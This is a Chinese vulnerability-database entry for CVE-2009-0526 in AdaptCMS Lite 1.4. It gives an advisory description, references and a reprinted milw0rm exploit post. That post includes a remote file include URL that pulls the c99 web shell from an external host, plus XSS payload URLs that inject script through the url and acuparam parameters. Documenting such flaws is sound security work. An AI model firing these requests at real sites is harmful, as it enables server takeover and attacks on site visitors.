adaptcms 'index.php'跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117375 漏洞类型 跨站脚本
发布时间 2009-02-09 更新时间 2009-02-12
CVE编号 CVE-2009-0526 CNNVD-ID CNNVD-200902-273
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/8016
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-273
|漏洞详情
AdaptCMS是简单易用的内容管理系统工具,能适应各种类型的网站。AdaptCMSLite1.4版本中的index.php存在多个跨站脚本攻击漏洞。远程攻击者可以借助(1)url和(2)acuparam参数以及(3)URI,注入任意的web脚本或HTML。
|漏洞EXP
# AdaptCMS Lite 1,4 Multiple Vulnes ( Remote File Include ,  Remote XSS )

# Free Download : http://213.203.218.125/a/ad/adaptcms/AdaptCMS_Lite_1.4.zip

# Or : http://www.adaptcms.com/

- Found By : RoMaNcYxHaCkEr
- My Site : WwW.Sec-Code.CoM
- My Group : Security - Codes Group

# Exploit [1]:

- Remote File Include :

http://www.sec-code.com/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=http://www.sec-code.com/c99.txt?

# Exploit [2]:

- Remote XSS :

http://www.sec-code.com/AdaptCMS_Lite_1.4_2/index.php?view=redirect&url=javascript:alert(413528022209)

Cross Site Scripting in URI :

http://www.sec-code.com/AdaptCMS_Lite_1.4_2/index.php?acuparam=>'><ScRiPt>alert(435038069432)</ScRiPt>

Cross Site Scripting in path :

http://www.sec-code.com/AdaptCMS_Lite_1.4_2/?=>"'><ScRiPt>alert(438948070551)</ScRiPt>

# Solutions :

Contact With Me I Will Declear All This Fucking Functions

# rXh

# bEST wISHES

# milw0rm.com [2009-02-09]
|参考资料

来源:XF
名称:adaptcms-index-xss(48611)
链接:http://xforce.iss.net/xforce/xfdb/48611
来源:BID
名称:33698
链接:http://www.securityfocus.com/bid/33698
来源:MILW0RM
名称:8016
链接:http://www.milw0rm.com/exploits/8016
来源:SECUNIA
名称:33866
链接:http://secunia.com/advisories/33866